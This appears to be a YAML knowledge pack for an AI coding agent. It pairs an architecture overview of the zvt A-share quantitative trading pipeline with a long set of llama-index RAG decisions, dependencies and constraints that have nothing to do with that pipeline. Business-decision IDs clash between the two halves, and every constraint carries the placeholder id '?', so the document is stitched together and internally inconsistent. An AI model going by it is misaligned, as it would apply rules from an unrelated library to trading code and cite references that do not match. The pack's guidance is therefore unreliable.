    hint: For A-share kdata, default to hfq for long-term analysis (dividend-adjusted) — trader.py:538 StockTrader
  - id: IH-03
    hint: SQLite connection MUST use check_same_thread=False for multi-threaded recorders
  - id: IH-04
    hint: Accumulator state serialization uses JSON with custom encoder/decoder hooks — contract/base_service.py
  - id: IH-05
    hint: Factor.level MUST match TargetSelector.level (enforced at add_factor) — factors/target_selector.py:84
preservation_manifest:
  required_objects:
    business_decisions_count: 26
    fatal_constraints_count: 5
    non_fatal_constraints_count: 47
    use_cases_count: 15
    semantic_locks_count: 12
    preconditions_count: 4
    evidence_quality_rules_count: 2
    traceback_scenarios_count: 5
architecture:
  pipeline: data_collection -> data_storage -> factor_computation -> target_selection -> trading_execution -> visualization
  stages:
  - id: data_collection
    narrative:
      does_what: TimeSeriesDataRecorder and FixedCycleDataRecorder fetch OHLCV and fundamental data from providers (eastmoney,
        joinquant, baostock, akshare) and persist domain objects (Stock1dKdata, BalanceSheet) to SQLite via df_to_db().
      key_decisions: BD-002 chose evaluate_start_end_size_timestamps for incremental fetch (not full refresh) because comparing
        to get_latest_saved_record avoids redundant API calls; BD-003 chose get_data_map field transformation to keep domain
        schema provider-agnostic.
      common_pitfalls: 'Don''t forget SL-11: Recorder subclass MUST declare both provider and data_schema class attributes
        else initialization fails with assertion error; finance-C-001 fatal violation.'
    business_decisions: []
  - id: data_storage
    narrative:
      does_what: StorageBackend persists DataFrames to per-provider SQLite databases at {data_path}/{provider}/{provider}_{db_name}.db
        using path templates from _get_path_template; Mixin.record_data and Mixin.query_data provide uniform read/write interface.
      key_decisions: BD-004 chose StorageBackend abstraction (not hardcoded SQLite) to allow future cloud storage swap; BD-006
        derives db_name from data_schema __tablename__ for per-domain database isolation.
      common_pitfalls: SL-04 violation (wrong DataFrame index) causes factor pipeline failures downstream; always ensure df.index.names
        == ['entity_id', 'timestamp'] before calling record_data.
    business_decisions: []
  - id: factor_computation
    narrative:
      does_what: Factor.compute() applies Transformer (stateless, e.g. MacdTransformer) then Accumulator (stateful, e.g. MaStatsAccumulator)
        to produce filter_result or score_result columns; EntityStateService persists per-entity rolling state across batches.
      key_decisions: BD-007 chose Factor inheriting DataReader for composable data access; SL-08 locks MACD at (fast=12, slow=26,
        n=9) — chose standard Appel parameters not adaptive because interpretability matters for practitioners.
      common_pitfalls: 'SL-07: Transformer MUST run before Accumulator — swapping order causes NaN propagation; SL-12: result_df
        must contain filter_result OR score_result column or TargetSelector silently drops all signals.'
    business_decisions: []
  - id: target_selection
    narrative:
      does_what: TargetSelector.add_factor() registers Factor instances; get_targets() returns entity_ids passing threshold
        filter at a specific timestamp, enabling point-in-time historical backtesting without look-ahead.
      key_decisions: BD-012 chose registrable factor list (not hardcoded) for runtime customization; BD-013 chose timestamp-specific
        filtering not current-only because backtests need historical point-in-time correctness.
      common_pitfalls: Factor.level MUST match TargetSelector.level (IH-05); mismatched levels cause silent empty target lists
        that look like no signals but are actually level-mismatch bugs.
    business_decisions: []
  - id: trading_execution
    narrative:
      does_what: Trader.run() calls sell() before buy() each cycle, generates TradingSignals with due_timestamp = happen_timestamp
        + level.to_second() for next-bar execution, and applies on_profit_control() for stop-loss/take-profit before regular
        target selection.
      key_decisions: SL-01 locks sell-before-buy order because available_long check in sim_account depends on it — chose this
        over symmetric ordering to prevent implicit leverage; BD-039 chose long=AND/short=OR multi-level logic to reflect
        risk asymmetry.
      common_pitfalls: 'SL-02 violation (immediate execution instead of next-bar) introduces look-ahead bias and makes backtest
        results unreproducible in live trading; SL-10: A-share T+1 constraint — backtesting without it overstates returns.'
    business_decisions: []
  - id: visualization
    narrative:
      does_what: Drawer.draw() combines kline main chart with factor overlays and Rect annotations for entry/exit signals
        using Plotly; Drawable interface on Factor enables consistent chart rendering across data types.
      key_decisions: BD-019 chose drawer_rects subclass override for custom annotations not hardcoded markers — allows traders
        to define entry/exit visuals without modifying base drawing logic.
      common_pitfalls: draw_result=True by default (BD-055) is fine for development but set draw_result=False in production/headless
        environments to avoid Plotly server startup overhead.
    business_decisions: []
  - id: cross_cutting_concerns
    narrative:
      does_what: 'Invariants and utilities that span multiple pipeline stages — collected from 8 source groups: cross_cutting(6),
        doc_ingest(1), index_build(4), node_parse(3), postprocess(2), retrieve(4), and 2 more.'
      key_decisions: 26 BDs merged here because they apply to more than one main stage (e.g. algorithm helpers, default value
        choices, ordering contracts, error handling). Agent should inspect individual BD summaries and link back to affected
        main stages via shared IDs.
      common_pitfalls: Cross-cutting concerns frequently surface as bugs when changes to one main stage unintentionally break
        another. Check constraints referencing these BDs and verify invariants still hold after any stage-local modification.
    business_decisions:
    - id: BD-021
      type: missing
      summary: SentenceSplitter chunking silently degrades on CJK / multilingual corpora
    - id: BD-022
      type: missing
      summary: No log warning when Refine drops chunks due to context overflow
    - id: BD-023
      type: missing
      summary: Embedding-model / query-model consistency is not enforced or recorded in storage
    - id: BD-024
      type: missing
      summary: asyncio_run thread-detour breaks contextvar mutations and produces silent warnings in production servers
    - id: BD-025
      type: missing
      summary: SemanticSplitterNodeParser has no max-chunk-size cap
    - id: BD-026
      type: missing
      summary: ServiceContext hard-removal breaks all pre-v0.10 tutorials with no fallback
    - id: BD-011
      type: B/BA
      summary: IngestionPipeline cache key = SHA-256(node_content + transform_dict_repr) with `<__main__.X at 0x...>` reprs
        stripped
    - id: BD-009
      type: B/BA
      summary: Default embedding lazy-initializes to OpenAIEmbedding (text-embedding-ada-002, 1536 dim)
    - id: BD-012
      type: T
      summary: delete()/update()/refresh() use logger.warning, not DeprecationWarning; auto-delegate to delete_ref_doc / update_ref_doc
        / refresh_ref_docs
    - id: BD-014
      type: B
      summary: ServiceContext.__init__ and from_defaults raise ValueError (hard removal, not warning)
    - id: BD-019
      type: B
      summary: VectorStoreIndex._build_index_from_nodes runs sync by default; async only when use_async=True
    - id: BD-002
      type: B/BA
      summary: SentenceSplitter chunk_overlap default is 200 tokens (NOT 20)
    - id: BD-006
      type: M/BA
      summary: SemanticSplitterNodeParser.breakpoint_percentile_threshold = 95
    - id: BD-007
      type: B/BA
      summary: SemanticSplitterNodeParser.buffer_size = 1 (single sentence per group)
    - id: BD-015
      type: B/BA
      summary: SentenceTransformerRerank defaults — model="cross-encoder/stsb-distilroberta-base", top_n=2, max_length=512,
        trust_remote_code Field=False but __init__=True
    - id: BD-017
      type: B/BA
      summary: LLMRerank defaults — top_n=10, choice_batch_size=10
    - id: BD-001
      type: B/BA
      summary: DEFAULT_SIMILARITY_TOP_K = 2 is the universal retriever default
    - id: BD-004
      type: M
      summary: RRF fusion uses fixed k=60.0 from Cormack et al. SIGIR'09
    - id: BD-005
      type: M
      summary: Embedding similarity default = cosine (SimilarityMode.DEFAULT)
    - id: BD-016
      type: B/BA
      summary: QueryFusionRetriever defaults — use_async=True, num_queries=4
    - id: BD-003
      type: B/M
      summary: Default response mode is COMPACT (not REFINE)
    - id: BD-008
      type: B/BA
      summary: Default LLM lazy-initializes to OpenAI gpt-3.5-turbo (via resolve_llm("default"))
    - id: BD-010
      type: B/BA
      summary: DEFAULT_CONTEXT_WINDOW = 3900 tokens, DEFAULT_NUM_OUTPUTS = 256 tokens
    - id: BD-018
      type: B
      summary: Refine silently returns prev response when refine_template overflows context
    - id: BD-020
      type: T
      summary: BaseSynthesizer reads Settings._prompt_helper (private attr) before falling back to PromptHelper.from_llm_metadata
    - id: BD-013
      type: B
      summary: ChatMode.REACT and ChatMode.OPENAI are removed (raise ValueError); replaced by ReActAgent / FunctionAgent from
        agent.workflow
resources:
  packages:
  - name: nltk (sentence tokenization)
    version_pin: latest
  - name: nest_asyncio
    version_pin: latest
  - name: workflows (external workflow primitive)
    version_pin: latest
  - name: pydantic (v2)
    version_pin: latest
  strategy_scaffold:
    entry_point_name: run_backtest
    output_path: result.csv
    execution_mode: backtest
    conditional_entry_points:
      backtest:
        entry_point_name: run_backtest
        output_path: result.csv
      collector:
        entry_point_name: run_collector
        output_path: result.json
      factor:
        entry_point_name: run_factor
        output_path: result.parquet
      training:
        entry_point_name: run_training
        output_path: result.json
      serving:
        entry_point_name: run_server
        output_path: result.json
      research:
        entry_point_name: run_research
        output_path: result.json
    tail_template: "# === DO NOT MODIFY BELOW THIS LINE ===\nif __name__ == \"__main__\":\n    result = run_backtest()  #\
      \ implement above\n    from validate import enforce_validation\n    enforce_validation(result, output_path=\"{workspace}/result.csv\"\
      )\n# === END DO NOT MODIFY ==="
  host_adapter:
    target: openclaw
    timeout_seconds: 1800
    shell_operator_restriction: 'exec tool intercepts && / ; / | — never chain: ''pip install X && python Y''. Use separate
      exec calls.'
    install_recipes:
    - python3 -m pip install nltk (sentence tokenization)
    - python3 -m pip install nest_asyncio
    - python3 -m pip install workflows (external workflow primitive)
    - python3 -m pip install zvt
    credential_injection: JoinQuant/QMT credentials require user-side '!' prefix shell login. Never hardcode credentials in
      generated scripts.
    path_resolution: '{workspace} resolves to ~/.openclaw/workspace/doramagic at execution time.'
    file_io_tooling: Use openclaw 'write' tool for .py/.sql files; 'exec' tool for python3 /absolute/path/script.py (absolute
      paths only).
constraints:
  fatal:
  - id: '?'
    when: When porting code from a llama-index v0.9 era tutorial / blog / Stack Overflow answer that constructs a ServiceContext
      object
    action: Delete every ServiceContext.from_defaults / ServiceContext(...) / set_global_service_context(...) call. Replace
      with attribute assignments on the module-level Settings singleton (e.g. Settings.llm = OpenAI(...), Settings.embed_model
      = OpenAIEmbedding(...), Settings.node_parser = SentenceSplitter(chunk_overlap=20)) BEFORE any index/query construction.
      Do not pass a ServiceContext kwarg to BaseIndex.from_documents.
    severity: fatal
    kind: domain_rule
    modality: must_not
    consequence: null
  - id: '?'
    when: When designing a workflow where the index is persisted to storage today and re-loaded later (possibly by a different
      process / different developer) for query
    action: Do not rely on storage_context to remember which embedder built the index. Treat the embed model identity as caller-managed
      state — always reconstruct the index with the same explicit embed_model that was used at index time, or fail loudly
      when re-loading. Read llamaindex-C-004 for the remedy.
    severity: fatal
    kind: domain_rule
    modality: must_not
    consequence: null
  - id: '?'
    when: When persisting an index to disk / vector store today for later re-load and query
    action: 'At index time: write a sidecar file (e.g. {storage_dir}/embed_model.json) with {''provider_class'': type(embed_model).__module__
      + ''.'' + type(embed_model).__name__, ''model_name'': getattr(embed_model, ''model_name'', None), ''embed_dim'': getattr(embed_model,
      ''embed_dim'', None) or len(embed_model.get_text_embedding(''probe''))}. At re-load: read the sidecar, compare against
      Settings.embed_model or the embed_model passed to load_index_from_storage, raise EmbedModelMismatchError on any drift.
      Do not fall back to the new embedder.'
    severity: fatal
    kind: domain_rule
    modality: must
    consequence: null
  - id: '?'
    when: When constructing SentenceSplitter for documents that contain Chinese / Japanese / Korean / other punctuation-light
      scripts
    action: 'Pass paragraph_separator that matches the corpus (e.g. ''\n\n'' for Chinese article markup, or a custom regex).
      Pass chunking_tokenizer_fn that produces a list of strings (e.g. lambda text: list(jieba.cut_for_search(text)) for Chinese,
      or a Stanza/spaCy CJK pipeline). Do NOT rely on the secondary CJK regex — it is fallback-only. Verify by running splitter.get_nodes_from_documents([Document(text=sample_zh)])
      on a CJK sample and asserting len(nodes) > 1 with reasonable boundaries.'
    severity: fatal
    kind: domain_rule
    modality: must
    consequence: null
  - id: '?'
    when: When porting code from a v0.9 era tutorial that constructs a chat engine via index.as_chat_engine(chat_mode=ChatMode.REACT/OPENAI)
    action: Replace as_chat_engine(chat_mode=ChatMode.REACT) with ReActAgent.from_tools([QueryEngineTool.from_defaults(query_engine=index.as_query_engine())],
      llm=...) and call .run() / await .run() on the agent. Similarly replace ChatMode.OPENAI with FunctionAgent.from_tools([...],
      llm=...) — note FunctionAgent requires an LLM with achat_with_tools support. The new agents are async-native; sync chat
      is no longer available via this path.
    severity: fatal
    kind: domain_rule
    modality: must_not
    consequence: null
  regular:
  - id: '?'
    when: When constructing a SentenceSplitter or relying on Settings.node_parser default for production embedding workloads
    action: 'Pass chunk_overlap explicitly: SentenceSplitter(chunk_size=1024, chunk_overlap=20) for cost optimization, or
      chunk_overlap=100-200 for high-recall workloads. Do not assume Settings.chunk_overlap returns DEFAULT_CHUNK_OVERLAP=20
      — settings.py:169-183 reads it from node_parser.chunk_overlap and the default node_parser is SentenceSplitter, so Settings.chunk_overlap
      returns 200. If you need parity with TokenTextSplitter (which uses 20), say so explicitly in code.'
    severity: high
    kind: domain_rule
    modality: must
    consequence: null
  - id: '?'
    when: When designing a production query path that uses ResponseMode.REFINE or ResponseMode.COMPACT (the factory default)
      with an LLM whose context window is unknown or smaller than ~16k tokens
    action: Before calling synthesize/aget_response, compute total_tokens = sum(prompt_helper.token_count(node.get_content())
      for node in nodes) + len(query_tokens) + refine_template_tokens + DEFAULT_NUM_OUTPUTS, and assert total_tokens < llm.metadata.context_window
      - safety_buffer (e.g. 256). If the assertion fails, switch to TREE_SUMMARIZE (which has explicit overflow handling)
      or shrink similarity_top_k. Wrap the synthesizer in a custom subclass that logs whenever the early-return branch is
      hit. Do not rely on Refine to surface overflow.
    severity: high
    kind: domain_rule
    modality: must
    consequence: null
  - id: '?'
    when: When adding SentenceTransformerRerank to a node_postprocessors pipeline, especially with a non-vendor / community
      HuggingFace model ID
    action: 'Always pass trust_remote_code=False explicitly: SentenceTransformerRerank(model=''...'', trust_remote_code=False,
      top_n=2). If the model genuinely requires trust_remote_code=True (some BAAI/bge variants do), document that decision
      in code with a comment and pin the model revision (model=''org/name@commit_sha'') to prevent silent code changes from
      upstream. Do NOT trust class-level Pydantic Field introspection to infer the runtime default.'
    severity: high
    kind: domain_rule
    modality: must
    consequence: null
  - id: '?'
    when: When using IngestionPipeline with an IngestionCache and iterating on custom TransformComponent code in development
      or production
    action: 'Treat cache identity as a caller responsibility. For production: pin a manual version/checksum field inside your
      custom transform''s to_dict() output (e.g. {''version'': ''my_transform-v3'', ''code_sha'': hashlib.sha256(inspect.getsource(my_func).encode()).hexdigest()[:8]})
      so a code change forces hash drift. Or skip the cache (cache=None) for transforms under active development. Do not assume
      restarting the process clears the cache — it persists in IngestionCache backend.'
    severity: high
    kind: domain_rule
    modality: must_not
    consequence: null
  - id: '?'
    when: When subclassing TransformComponent for use inside an IngestionPipeline that has a non-None cache argument
    action: Override to_dict() (or extend the inherited dict) to inject either a manually-bumped 'version' string OR an inspect.getsource()-based
      'code_sha' field. The field must change whenever the transform's behavior changes. Verify by running pipeline.run()
      once, modifying the transform's logic, running again, and asserting the cache miss happens.
    severity: high
    kind: domain_rule
    modality: must
    consequence: null
  - id: '?'
    when: When choosing SemanticSplitterNodeParser for documents whose downstream LLM context window or embedding model max_seq_length
      is bounded
    action: Either (a) add a manual post-processing step that splits any node with token_count > max_acceptable on character/sentence
      boundaries before sending to the index, OR (b) lower breakpoint_percentile_threshold (e.g. 80-90) to force more cuts
      on uniform documents, OR (c) chain SemanticSplitter → TokenTextSplitter as a safety net. Treat the 'semantic' label
      as a strategy hint, not a size guarantee.
    severity: high
    kind: domain_rule
    modality: must_not
    consequence: null
  - id: '?'
    when: When building a production ingestion pipeline that uses SemanticSplitterNodeParser as the node parser
    action: 'Use a TransformComponent list like [SemanticSplitterNodeParser(...), TokenTextSplitter(chunk_size=embedder.max_seq_length,
      chunk_overlap=20)] in IngestionPipeline.transformations. The TokenTextSplitter will subdivide any oversized semantic
      chunk into model-acceptable pieces. After running the pipeline, validate: for n in nodes: assert len(tokenizer.encode(n.get_content()))
      <= embedder.max_seq_length, halt deploy on assertion failure.'
    severity: high
    kind: domain_rule
    modality: must
    consequence: null
  - id: '?'
    when: When wiring LlamaIndex sync APIs (query, retrieve, chat) into an async server (FastAPI, Starlette, Sanic) or a Jupyter
      notebook with a running loop
    action: 'Use the async-native entry methods: aquery / aretrieve / achat / asynthesize. Do not call the sync wrappers from
      inside an event loop. If you must, instrument both sides explicitly — set tracing context BEFORE calling the sync method
      and re-set AFTER, do not rely on the contextvar to flow through. For OpenTelemetry/Datadog/Sentry tracing, prefer the
      async APIs end-to-end.'
    severity: medium
    kind: domain_rule
    modality: must_not
    consequence: null
  - id: '?'
    when: When wiring LlamaIndex into an async web framework, a Jupyter notebook with a running event loop, or any code that
      already runs inside asyncio.run() / loop.run_until_complete()
    action: 'In FastAPI: async def endpoint(): return await query_engine.aquery(q). In Jupyter: response = await query_engine.aquery(q)
      (top-level await is supported). Audit any call to query() / retrieve() / synthesize() / chat() inside async code and
      convert to the async sibling. Confirm by grepping the codebase: rg ''\.query\('' and replacing with .aquery( inside
      async def bodies.'
    severity: high
    kind: domain_rule
    modality: must
    consequence: null
  - id: '?'
    when: When initializing LlamaIndex in any environment with vendor / data-residency / cost constraints, or when using a
      non-OpenAI provider exclusively
    action: 'At startup (before any index construction): from llama_index.core import Settings; Settings.llm = <YourLLM>(model=''...'');
      Settings.embed_model = <YourEmbedder>(model=''...''). Document the chosen models in code/config so future readers know
      the brand was deliberate. For air-gapped or cost-sensitive deployments use Ollama / vLLM / fastembed via the matching
      llama-index-llms-* / llama-index-embeddings-* integration packages. Verify that no lazy-default code path runs by setting
      both before the first import of any index/retriever class that reads Settings.'
    severity: medium
    kind: domain_rule
    modality: should
    consequence: null
  - id: '?'
    when: When choosing similarity_top_k for any retriever in a workload that is not pure short-form factual Q&A
    action: 'Pass similarity_top_k explicitly: VectorIndexRetriever(index, similarity_top_k=10) for typical RAG, similarity_top_k=20
      for synthesis-heavy workloads, similarity_top_k=2 only for cost-critical short Q&A. Calibrate empirically: measure recall@k
      on a held-out query set with k in {2,5,10,20} and pick the smallest k that meets your target. Be aware that increasing
      top_k increases downstream synthesis token cost roughly linearly.'
    severity: medium
    kind: domain_rule
    modality: should
    consequence: null
  - id: '?'
    when: When designing a custom BaseIndex subclass to implement an alternative index structure (e.g. a custom graph index
      or a managed-platform index wrapper)
    action: Implement exactly these 5 methods. _build_index_from_nodes consumes List[BaseNode] and returns the IndexStruct
      subclass. _insert handles per-node insertion after initial build. _delete_node removes by node_id. ref_doc_info is a
      property returning Dict[str, RefDocInfo] for change-detection. as_retriever returns a BaseRetriever subclass. Verify
      by trying to instantiate your subclass with an empty list — if Python raises 'Can't instantiate abstract class', a method
      is missing.
    severity: high
    kind: domain_rule
    modality: must
    consequence: null
  - id: '?'
    when: When subclassing BaseRetriever to wrap a custom backend (e.g. a managed search service, a custom hybrid algorithm,
      a domain-specific filter chain)
    action: 'Implement def _retrieve(self, query_bundle: QueryBundle) -> List[NodeWithScore]. For network-bound backends,
      also implement async def _aretrieve(self, query_bundle: QueryBundle) -> List[NodeWithScore] with the backend''s native
      async client. Inherit from BaseRetriever directly (not from a concrete subclass) to get PromptMixin (template overrides)
      + DispatcherSpanMixin (instrumentation) for free.'
    severity: high
    kind: domain_rule
    modality: must
    consequence: null
  - id: '?'
    when: When subclassing BaseQueryEngine to build a custom end-to-end retrieve+synthesize pipeline (e.g. a domain-specific
      routed query engine)
    action: 'Implement both: def _query(self, query_bundle: QueryBundle) -> RESPONSE_TYPE and async def _aquery(self, query_bundle:
      QueryBundle) -> RESPONSE_TYPE. If a true async path is unavailable, _aquery may still need to exist — even as a thin
      wrapper that delegates via asyncio_run or asyncio.to_thread — to satisfy the abstract contract. Verify by instantiating
      the subclass and calling both query() and aquery() once each.'
    severity: high
    kind: domain_rule
    modality: must
    consequence: null
  - id: '?'
    when: When subclassing BaseSynthesizer to add a custom response combine strategy (e.g. citation-injection, custom Refine
      variant)
    action: 'Implement both methods: def get_response(self, query_str: str, text_chunks: Sequence[str], **kwargs) -> RESPONSE_TEXT_TYPE
      and async def aget_response(self, query_str: str, text_chunks: Sequence[str], **kwargs) -> RESPONSE_TEXT_TYPE. For streaming
      support, use llm.astream_complete in aget_response and yield/return the StreamingResponse. Do not implement aget_response
      as await asyncio.to_thread(self.get_response, ...) if you need real streaming.'
    severity: high
    kind: domain_rule
    modality: must
    consequence: null
  - id: '?'
    when: When configuring a Refine response synthesizer (or get_response_synthesizer factory) for a workload that needs both
      token streaming and Pydantic-validated structured output
    action: 'Pick one: (a) streaming=True, structured_answer_filtering=False — get token-by-token streaming, no per-chunk
      relevance filtering; OR (b) streaming=False, structured_answer_filtering=True — get one-shot validated structured output,
      no streaming. For workflows that need both, implement a custom synthesizer subclass that streams the raw LLM output
      to a buffer, then validates the buffer once complete (defeats partial streaming UX, but is the only correct path).'
    severity: high
    kind: domain_rule
    modality: must_not
    consequence: null
  - id: '?'
    when: When choosing FunctionAgent vs ReActAgent for a non-OpenAI / non-Anthropic / non-Gemini LLM provider
    action: 'Verify support: hasattr(llm, ''achat_with_tools'') AND llm.metadata.is_function_calling_model. If False, use
      ReActAgent (text-based ReAct loop, no native tool API needed) instead. For partially-supporting LLMs, test with a single
      tool call before scaling. Document which LLM was tested in code/comments.'
    severity: high
    kind: domain_rule
    modality: must
    consequence: null
  - id: '?'
    when: When defining FunctionTools for use with FunctionAgent and leaving allow_parallel_tool_calls at the default
    action: 'Either (a) audit each tool for thread/coroutine safety: no module-level state mutation, no shared file handle,
      idempotent on retry; OR (b) pass allow_parallel_tool_calls=False to FunctionAgent constructor to force serialized execution
      (loses some latency benefit but matches the safer mental model). For tools that mutate external systems (write to a
      database, send an email), default to allow_parallel_tool_calls=False unless the tool itself implements idempotency keys.'
    severity: high
    kind: domain_rule
    modality: must
    consequence: null
  - id: '?'
    when: When configuring QueryFusionRetriever for a deployment using a local single-thread LLM (Ollama, llama.cpp, vLLM
      single-replica) or a cost-sensitive remote LLM
    action: Set use_async=False for local single-thread LLMs. Set num_queries=1 if you only need rank fusion across multiple
      retrievers and want to skip the LLM query-expansion cost (saves 3 LLM calls per retrieval). Document the choice in code
      so future readers know the defaults were deliberately overridden.
    severity: medium
    kind: domain_rule
    modality: should
    consequence: null
  - id: '?'
    when: When wiring LLMRerank as a node_postprocessor for a retriever whose similarity_top_k or LLM capability is unclear
    action: 'Set choice_batch_size=5 for stronger LLMs (GPT-4-class), choice_batch_size=3 for weaker / smaller LLMs (7B-13B
      local models). Set top_n explicitly such that top_n <= retriever.similarity_top_k. Empirically calibrate: rerank a known-truth
      set with batch_size in {3,5,10} and pick the largest size that still preserves rank order on held-out queries.'
    severity: medium
    kind: domain_rule
    modality: should
    consequence: null
  - id: '?'
    when: When constructing a query engine for a workload where reranking would meaningfully improve precision (recall-padded
      top_k, hybrid retrieval, multi-doc corpus)
    action: 'Pass postprocessors explicitly: query_engine = index.as_query_engine(node_postprocessors=[SentenceTransformerRerank(model=''BAAI/bge-reranker-v2-m3'',
      top_n=3, trust_remote_code=False)]). For multiple postprocessors, pass a list — they execute in order. Verify by inspecting
      query_engine._node_postprocessors after construction.'
    severity: medium
    kind: domain_rule
    modality: must
    consequence: null
  - id: '?'
    when: When wiring SentenceTransformerRerank for any non-English corpus and leaving the model parameter at default
    action: 'Pass an explicit multilingual model: SentenceTransformerRerank(model=''BAAI/bge-reranker-v2-m3'', top_n=3, trust_remote_code=False,
      max_length=512). For Chinese-only deployments, BAAI/bge-reranker-v2-m3 or BAAI/bge-reranker-large-zh are reasonable
      choices. Always verify the chosen model''s HuggingFace card explicitly states multilingual training data — pick by the
      language label, not by popularity.'
    severity: high
    kind: domain_rule
    modality: must_not
    consequence: null
  - id: '?'
    when: When pairing SentenceTransformerRerank with a SentenceSplitter or other parser whose chunk_size exceeds 512 tokens
    action: Either (a) set SentenceTransformerRerank(max_length=2048) (or whatever covers your chunk_size + query length)
      IF the chosen model supports longer inputs (most BAAI/bge-reranker-v2-* support up to 8192); OR (b) ensure chunk_size
      <= 480 (leaving ~32 tokens for the query) at the upstream node parser to fit within 512. Verify by checking model.config.max_position_embeddings
      on the loaded cross-encoder.
    severity: medium
    kind: domain_rule
    modality: should
    consequence: null
  - id: '?'
    when: When selecting response_mode for a query engine deployment with non-trivial chunk count or non-large context LLM
    action: 'Match mode to workload: COMPACT for large-context LLMs (16k+); TREE_SUMMARIZE for whole-document summaries (regardless
      of LLM size); REFINE for ordered chain-of-thought; SIMPLE_SUMMARIZE only when sum(chunk_tokens) < context_window with
      safety margin; ACCUMULATE / COMPACT_ACCUMULATE for per-chunk independent answers (then concat). Document the choice
      with reasoning in code comments.'
    severity: medium
    kind: domain_rule
    modality: should
    consequence: null
  - id: '?'
    when: When ingesting a large document corpus (1000+ nodes) and choosing between sync and async build paths
    action: 'For batch / offline ingestion: set use_async=True, show_progress=False — gets concurrent embedding without nest_asyncio
      monkey-patch. For interactive / debug ingestion: use_async=False — sequential, easier to step through. Avoid use_async=True
      + show_progress=True inside an async server (FastAPI startup hook, async background task) — the nest_asyncio.apply()
      side effect can interfere with other async libraries.'
    severity: medium
    kind: domain_rule
    modality: must
    consequence: null
  - id: '?'
    when: When constructing a custom LLM subclass or using an integration that may not auto-populate llm.metadata.context_window
      for the specific model
    action: 'After constructing the LLM, verify llm.metadata.context_window matches the model''s actual capacity (e.g. assert
      llm.metadata.context_window >= 100000 for Claude 3.5 Sonnet''s 200k context). For custom LLMs, override the metadata
      property to return CompletionResponseGen-compatible values: LLMMetadata(context_window=200000, num_output=4096, ...).
      Check PromptHelper.from_llm_metadata behavior post-fix by inspecting prompt_helper.context_window.'
    severity: high
    kind: domain_rule
    modality: must
    consequence: null
  - id: '?'
    when: When building a multi-retriever fusion pipeline or considering whether to write a custom fusion algorithm
    action: Use QueryFusionRetriever(retrievers=[r1, r2, ...], mode=FUSION_MODES.RECIPROCAL_RANK, similarity_top_k=10). The
      k=60 default is a paper-validated fusion-rank dampener that works across diverse retrievers with heterogeneous score
      scales. If you want to tune k, fork the function and run an A/B comparison against the paper default on your held-out
      query set; document the result.
    severity: medium
    kind: domain_rule
    modality: must
    consequence: null
  - id: '?'
    when: When configuring similarity computation for an embedder whose normalization status is unknown
    action: 'Verify normalization: vec = embed_model.get_text_embedding(''probe''); assert abs(np.linalg.norm(vec) - 1.0)
      < 0.01 indicates L2-normalized. If not normalized, configure VectorStoreQuery with similarity mode set to DOT_PRODUCT,
      OR pre-normalize vectors at index/query time. Most modern text embedders output normalized vectors; raw word vectors
      / older sentence-transformers may not.'
    severity: medium
    kind: domain_rule
    modality: must
    consequence: null
  - id: '?'
    when: When using SemanticSplitterNodeParser on a corpus whose style differs significantly from medium-length English prose
    action: 'For technical / uniform docs: lower threshold to 80-90 to force more breakpoints. For dialogue / short sentences:
      raise buffer_size to 2 or 3 to stabilize per-group embeddings. Calibrate by parsing a sample of 10 representative documents
      and inspecting the resulting chunk count and length distribution; aim for chunks ~500-1500 tokens. Document the chosen
      values with one-line rationale in code.'
    severity: medium
    kind: domain_rule
    modality: should
    consequence: null
  - id: '?'
    when: When auditing existing code for deprecated llama-index API usage or running CI deprecation checks
    action: 'Add a CI grep step: rg -n ''\.delete\(|\.update\(|\.refresh\('' --type py | grep -v ''delete_ref_doc\|update_ref_doc\|refresh_ref_docs''
      to find candidate sites. Manually verify each is on a BaseIndex subclass (not on dict/list .update etc.) and migrate
      to the _ref_doc variants. Optionally monkeypatch logger to convert these specific warnings to errors during CI.'
    severity: low
    kind: domain_rule
    modality: should
    consequence: null
  - id: '?'
    when: When building a production IngestionPipeline expecting cache to cover both node parsing AND embedding steps
    action: Construct pipeline = IngestionPipeline(transformations=[SentenceSplitter(...), embed_model], cache=IngestionCache(...),
      docstore=..., docstore_strategy=DocstoreStrategy.UPSERTS). Embedding (an instance of BaseEmbedding subclass that implements
      TransformComponent) MUST appear in the transformations list explicitly. Verify by running pipeline.run() twice on identical
      input and asserting the second run is fast (cache hit on both transformations).
    severity: high
    kind: domain_rule
    modality: must
    consequence: null
  - id: '?'
    when: When designing a query engine for a workload where retrieved chunks may contain PII / regulated content / disallowed
      content
    action: 'Add a postprocessor explicitly: query_engine = index.as_query_engine(node_postprocessors=[PIINodePostprocessor(llm=llm),
      <other postprocessors>]). For domain-specific filtering (e.g. financial advice disclaimer, jailbreak-prompt rejection),
      implement a custom BaseNodePostprocessor subclass that returns a filtered List[NodeWithScore]. Do not assume the synthesizer
      LLM will refuse — it sees the chunks and may quote them.'
    severity: high
    kind: domain_rule
    modality: must
    consequence: null
  - id: '?'
    when: When subclassing BaseIndex or wrapping from_documents in a custom factory function
    action: 'If you reimplement from_documents (or wrap it), preserve the loop: for doc in documents: docstore.set_document_hash(doc.id_,
      doc.hash). Verify by ingesting a document, modifying its content, and calling index.refresh_ref_docs([modified_doc])
      — assert the modified doc gets re-embedded. The hash is computed by the Document subclass''s hash property; do not override
      hash without ensuring it remains a deterministic function of content.'
    severity: high
    kind: domain_rule
    modality: must
    consequence: null
  - id: '?'
    when: When tuning the alpha parameter for HYBRID retrieval and switching between vector store backends
    action: Read the integration package's source for the chosen backend (e.g. llama_index.vector_stores.qdrant.QdrantVectorStore.query)
      to confirm alpha's direction and range. Test with alpha=0.0 and alpha=1.0 on a known query — observe which extreme returns
      dense-only vs sparse-only results. Document the chosen alpha value with one-line rationale in code. When switching backends,
      re-tune alpha from scratch.
    severity: medium
    kind: domain_rule
    modality: must_not
    consequence: null
  - id: '?'
    when: When optimizing throughput for production batch ingestion or high-concurrency query serving
    action: 'At each hop verify and override: VectorStoreIndex(..., use_async=True), QueryFusionRetriever(..., use_async=True),
      and ensure each sub-retriever''s BaseRetriever subclass implements _aretrieve natively (not the asyncio.to_thread fallback).
      Run a quick benchmark: time 100 sequential aretrieve() calls, then 100 concurrent via asyncio.gather, and confirm the
      concurrent path is significantly faster.'
    severity: medium
    kind: domain_rule
    modality: should
    consequence: null
  - id: '?'
    when: When pinning dependencies for a production deployment using FunctionAgent / ReActAgent / AgentWorkflow / custom
      Workflow subclasses
    action: In requirements.txt / pyproject.toml, pin both llama-index-core==<X.Y.Z> AND workflows==<A.B.C> (or whichever
      package owns the actual Workflow class — verify via pip show). Subscribe to the workflows package's changelog separately
      from llama-index. When upgrading either package, re-run integration tests for any custom @step / @event subclasses.
    severity: medium
